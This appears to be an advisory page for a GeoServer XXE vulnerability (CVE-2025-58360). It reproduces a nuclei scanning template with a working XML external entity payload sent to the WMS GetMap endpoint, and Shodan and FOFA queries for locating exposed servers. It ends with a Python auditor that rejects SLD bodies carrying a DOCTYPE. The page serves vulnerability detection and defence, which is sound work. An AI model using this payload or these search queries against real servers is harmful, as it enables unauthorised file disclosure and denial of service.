CVE-2025-58360: GeoServer - XML External Entity Injection

Date: 2025-12-02 | Affected software: GeoServer | PoC: published

Vulnerability description

GeoServer 2.26.0 to 2.26.2 and 2.25.6 contain an XML External Entity (XXE) injection caused by insufficient sanitization of the XML input accepted by the /geoserver/wms GetMap operation. An attacker who submits crafted XML can disclose files readable by the server process or cause a denial of service; exploitation requires only the ability to send such a request.

PoC code [published]

id: CVE-2025-58360

info:
  name: GeoServer - XML External Entity Injection
  author: lbb,xbow,darses
  severity: high
  description: |
    GeoServer 2.26.0 to 2.26.2 and 2.25.6 contains an XML External Entity (XXE) injection caused by insufficient sanitization of XML input in /geoserver/wms GetMap operation, letting attackers disclose files or cause DoS, exploit requires crafted XML input.
  impact: |
    Attackers can disclose sensitive files or cause denial of service by exploiting XML external entity processing.
  remediation: |
    Update to GeoServer 2.25.6, 2.26.3, 2.27.0 or later.
  reference:
    - https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    - https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
    cvss-score: 8.2
    cve-id: CVE-2025-58360
    epss-score: 0.12057
    epss-percentile: 0.93527
    cwe-id: CWE-611
  metadata:
    verified: true
    max-request: 2
    vendor: osgeo
    product: geoserver
    shodan-query:
      - title:"geoserver"
      - 'http.html_hash:1093634893 "Content-Disposition: inline"'
      - http.favicon.hash:97540678
      - html:"/geoserver/"
    fofa-query:
      - title="geoserver"
      - app="geoserver"
      - icon_hash="97540678"
      - body="/geoserver/"
  tags: cve,cve2025,geoserver,xxe,wms,vkev,kev

http:
  - method: POST
    path:
      - "{{BaseURL}}/geoserver/wfs?service=WMS&request=GetMap"
      - "{{BaseURL}}/wfs?service=WMS&request=GetMap"

    headers:
      Content-Type: application/vnd.ogc.sld+xml

    body: |
      <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
      <StyledLayerDescriptor version="1.0.0">
      <NamedLayer><Name>&xxe;</Name></NamedLayer>
      </StyledLayerDescriptor>

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ServiceException"
          - "java.io.FileNotFoundException"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022005e4e5a3be5828879b7cadb24c5d7a9d9660e51d88037acd25396e06e9bea6610221009071df8ef12b64a23aaf7bbc00ea5fd31e0c749fb3005b27d33328561793c1bc:922c64590222798bb761d5b6d8e72950
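The GetMap request in the template above is only dangerous because the SLD body (Content-Type application/vnd.ogc.sld+xml) reaches a DTD-aware parser that resolves the declared SYSTEM entity. The following Python is added here as an illustration and is not part of the advisory, the nuclei template, or GeoServer: it audits an incoming SLD body for DOCTYPE and external entity declarations without resolving anything, then refuses to parse any body that carries a DOCTYPE. The PoC body is a constructed copy of the template's payload and the benign SLD is a constructed, namespace-less sample.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

# Constructed samples: the PoC body from the template, and a harmless SLD.
POC_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>&xxe;</Name></NamedLayer>
</StyledLayerDescriptor>"""

BENIGN_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer><Name>roads</Name></NamedLayer>
</StyledLayerDescriptor>"""


def audit_xml_body(body: bytes) -> dict:
    """Record DOCTYPE and entity declarations; never open an external target."""
    findings = {"doctype": None, "external_entities": [], "internal_entities": []}
    parser = expat.ParserCreate()
    # Never fetch an external DTD subset or parameter entities while auditing.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings["doctype"] = {"name": name, "system_id": system_id, "public_id": public_id}

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:  # SYSTEM/PUBLIC entity
            findings["external_entities"].append(
                {"name": name, "system_id": system_id, "public_id": public_id})
        else:
            findings["internal_entities"].append(name)

    def on_external_ref(context, base, system_id, public_id):
        return 1  # acknowledge the reference so parsing continues, but load nothing

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(body, True)
    return findings


def parse_sld(body: bytes) -> dict:
    """Gateway-style check: reject any SLD carrying a DOCTYPE, otherwise parse it."""
    findings = audit_xml_body(body)
    if findings["doctype"] is not None:
        names = [e["name"] for e in findings["external_entities"]]
        return {"accepted": False, "root": None,
                "reason": f"DOCTYPE present; external entities: {names}"}
    return {"accepted": True, "root": ET.fromstring(body), "reason": ""}
```

Placed in front of the WMS endpoint, the same check doubles as a detection source: every rejected body with a non-empty external entity list is a concrete attempt matching the payload shape of this template.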
